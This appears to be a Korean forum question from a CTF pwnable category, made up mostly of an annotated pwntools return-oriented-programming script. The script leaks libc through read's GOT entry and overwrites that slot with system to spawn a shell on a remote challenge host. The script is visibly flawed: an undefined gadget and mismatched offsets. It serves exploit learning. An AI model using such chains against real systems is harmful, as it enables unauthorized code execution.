EOF..... : (

from pwn import *

# Reviewer summary: pwntools script for the "basic_rop_x86" binary served at the
# host below. It overflows a stack buffer with a three-stage return chain:
# (1) print the resolved address stored in read's GOT slot, (2) read new bytes
# into that same slot, (3) call through read@plt again with a string argument.
# NOTE(review): the chain presumes the target has a writable GOT, no stack
# canary and a non-PIE base (pppr is a fixed address). None of that is visible
# in this script; full RELRO or a stack protector would stop these steps.
context.log_level = 'debug'  # pwntools prints all traffic sent and received
context.arch = 'i386'  # 32-bit target, matching the p32()/u32() helpers used below

shell = remote('host3.dreamhack.games',22260)  # TCP connection to the challenge service

elf = ELF('./basic_rop_x86')  # local copy of the target, used for PLT/GOT lookups
libc = ELF('./libc.so.6')  # must be the same libc build the remote uses, or the offsets below are wrong

# presumably the address of a pop; pop; pop; ret sequence in the binary (name
# suggests it) — TODO confirm against the disassembly
pppr = 0x08048689
read_plt = elf.plt['read']
read_got = elf.got['read']
write_plt = elf.plt['write']

# 0x44 filler bytes plus 4 more bytes; presumably buffer-to-saved-EBP distance
# followed by the saved EBP itself — the offsets cannot be checked from here
payload = b'A'*0x44 + b'B'*0x4

# Stage 1: leak the address stored in read's GOT slot -> write(1, read_got, 4)
payload += p32(write_plt)
payload += p32(pppr)  # return address: skips the three arguments below
payload += p32(1)
payload += p32(read_got)
payload += p32(4)

# Stage 2: store system's address in read's GOT slot -> read(0, read_got, 4)
# Only 4 bytes are requested here.
payload += p32(read_plt)
payload += p32(pppr)
payload += p32(0)
payload += p32(read_got)
payload += p32(4)

# Stage 3: system(/bin/sh\x00) — goes through read@plt, relying on the GOT
# slot having been replaced in stage 2
payload += p32(read_plt)
# NOTE(review): `pr` is never assigned in the visible script, so this line
# raises NameError before anything is sent — confirm the intended gadget
payload += p32(pr)
payload += p32(read_got+0x8)  # pointer argument: 8 bytes past the start of the GOT slot

shell.send(payload)
# Waits for 0x40 'A' bytes in the output; presumably the program echoes part
# of the input buffer before returning — verify against the binary
shell.recvuntil(b'A'*0x40)
read = u32(shell.recvn(4))  # the 4 bytes printed by stage 1: runtime address of read
lb = read - libc.sym['read']  # libc load base = leaked address - read's offset in libc
system = lb + libc.sym['system']

# Sends 12 bytes: the 4-byte address followed by the 8-byte string.
# NOTE(review): stage 2 requested 4 bytes and stage 3 points at read_got+0x8;
# confirm these lengths and offsets agree with what is sent here
shell.send(p32(system)+b'/bin/sh\x00')
shell.interactive()

잘못된 부분이 있을까요!

#pwnable
답변 1

해결했습니다.

2022.07.15. 06:15